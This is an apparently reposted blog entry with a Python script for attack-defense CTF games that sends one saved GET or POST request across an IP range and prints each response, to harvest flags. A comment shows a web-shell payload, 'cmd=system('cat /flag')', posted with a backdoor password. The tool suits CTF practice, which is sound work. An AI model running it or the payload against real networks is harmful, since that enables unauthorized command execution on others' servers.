批量get_flag v3
发布时间:2019-06-12


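#!/usr/bin/env python
# encoding: utf-8
from IPy import IP
import requests
import sys


# Batch Get_Flag: send the same HTTP request to every host in an address
# range and print each response body.
def IPs(ip):
    """Expand an address specification into a list of address strings.

    Accepts CIDR notation such as "192.168.10.0/24" (expanded by IPy) or a
    last-octet range such as "192.168.10.0-20" (both ends inclusive).
    Returns an empty list when the argument contains neither "/" nor "-".
    """
    spec = str(ip)
    if spec.find("/") > 0:
        # IPy yields IP objects; convert them so every caller receives plain
        # strings (the callers concatenate the result into messages and URLs).
        return [str(addr) for addr in IP(spec)]
    if spec.find("-") > 0:
        last_dot = spec.rfind('.')
        dash = spec.rfind('-')
        prefix = spec[:last_dot + 1]
        first = int(spec[last_dot + 1:dash])
        last = int(spec[dash + 1:])
        return [prefix + str(octet) for octet in range(first, last + 1)]
    return []


# The same fixed header set is sent with every request. Because it never
# varies, this exact Referer/User-Agent pair repeated across many hosts in a
# short window is a stable pattern in the receiving servers' access logs.
headers = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Referer': 'https://www.baidu.com',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 ',
    'Cache-Control': 'no-cache'
}


def get_Requests(ip, payload):
    """Send a GET request to http://<ip>/<payload> and return the body text.

    Returns the string "Connect Timeout" when the connection attempt times
    out. Only ConnectTimeout is handled here; any other requests exception
    propagates to the caller. The returned text is untrusted remote content
    and the callers print it verbatim.
    """
    url = 'http://' + str(ip) + '/' + payload
    try:
        response = requests.get(url, headers=headers, timeout=3)
        return response.text
    except requests.exceptions.ConnectTimeout:
        return "Connect Timeout"


def post_Requests(ip, payload, post_data):
    """Send a form POST to http://<ip>/<payload> and return the body text.

    *post_data* is a "k1=v1&k2=v2" string. Each pair is split at its first
    "=" only, so a value that itself contains "=" is kept whole, and a pair
    without "=" becomes a key with an empty value. The parsed form is
    printed before the request is sent.

    Returns "Connect Timeout" on a connection timeout; other requests
    exceptions propagate to the caller.
    """
    url = 'http://' + str(ip) + '/' + payload
    form = {}
    for pair in post_data.split('&'):
        key, _, value = pair.partition('=')
        form[key] = value
    print(form)
    try:
        response = requests.post(url,
                                 headers=headers,
                                 data=form,
                                 timeout=3)
        return response.text
    except requests.exceptions.ConnectTimeout:
        return "Connect Timeout"


def open_file(file_name):
    """Read *file_name* and return its lines with the trailing newline removed."""
    # The context manager closes the handle even if reading fails.
    with open(file_name) as handle:
        return [line.strip('\n') for line in handle]


def get_Data(data):
    """Return the request target from a saved GET request.

    *data* is the list of lines from open_file(); the target is the second
    space-separated field of the first line.
    """
    return data[0].split(' ')[1]


# Example POST body from the original post:
# pass=365Eval@Awd&cmd=system('cat /flag')
def post_Data(data):
    """Return [target, body] from a saved POST request.

    The target is the second space-separated field of the first line and the
    body is taken to be the last line of the file.
    """
    return [data[0].split(' ')[1], data[-1]]


def _run_from_file(ip, filename):
    """Send the request saved in *filename* to every host in *ip*.

    The method is read from the first word of the file's first line; anything
    other than GET or POST (or an empty file) prints 'error'.
    """
    data = open_file(filename)
    if not data:
        print('error')
        return
    method = data[0].split(' ')[0]
    if method == 'GET':
        target = get_Data(data)
        for host in IPs(ip):
            print('[*]testing ' + host)
            print(get_Requests(host, target))
    elif method == 'POST':
        target, body = post_Data(data)
        for host in IPs(ip):
            print('[*]testing ' + host)
            print(post_Requests(host, target, body))
    else:
        print('error')


def cmd():
    """Command-line entry point.

    With no arguments, print the usage text and fall back to the interactive
    prompt in main(). Otherwise read --type, --payload, --data, --file and
    --ip (each written as --name=value) and run the matching mode.
    """
    request_type = ''
    payload = ''
    post_data = ''
    filename = ''
    ip = ''
    if len(sys.argv) == 1:
        print("Instructions for use")
        # The option is parsed as --payload below; the usage text previously
        # advertised it as --pyload.
        print("python3 Game.py --type=get --ip=192.168.10.0/24 --payload=test.php")
        # On a POSIX shell the --data value must be quoted, otherwise "&"
        # ends the command.
        print("python3 Game.py --type=post --ip=192.168.10.0/24 --payload=test.php --data=username=sss&passwd=ddd")
        print("python3 Game.py --file=post.txt --ip=192.168.10.0/24 ")
        main()
        return

    for arg in sys.argv[1:]:
        # Split at the first "=" only: a --data value such as
        # "username=sss&passwd=ddd" contains further "=" characters.
        name, _, value = arg.partition('=')
        if name == '--type':
            request_type = value
        elif name == '--payload':
            payload = value
        elif name == '--data':
            post_data = value
        elif name == '--file':
            filename = value
        elif name == '--ip':
            ip = value

    mode = request_type.upper()
    if mode == 'GET':
        for host in IPs(ip):
            print('[*]testing ' + host)
            print(get_Requests(host, payload))
    elif mode == 'POST':
        # --payload and --data are passed through directly; post_Data() is
        # only meant for the line list of a saved request file.
        for host in IPs(ip):
            print('[*]testing ' + host)
            print(post_Requests(host, payload, post_data))
    elif filename:
        # File mode is also reached when --type is absent, which is how the
        # third usage line invokes the script.
        _run_from_file(ip, filename)
    else:
        print('error')


def main():
    """Interactive mode: prompt for the range, the method and the request."""
    print('#get_Flag V2.0')
    ip = input('Please enter the IP range >>>')
    num = int(input('Please select request method 1 = get 2 = post 3 = auto>>>'))
    if num == 3:
        filename = input('Please enter filename>>>')
        _run_from_file(ip, filename)
        return

    payload = input('Please enter the payload>>>')
    if num == 2:
        post_data = input('Please enter post_data>>>')
        for host in IPs(ip):
            print('[*]testing ' + host)
            print(post_Requests(host, payload, post_data))
    else:
        # Any selection other than 2 or 3 is treated as GET.
        for host in IPs(ip):
            print('[*]testing ' + host)
            print(get_Requests(host, payload))


if __name__ == '__main__':
    cmd()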

  

转载于:https://www.cnblogs.com/tide-sec/p/9151469.html
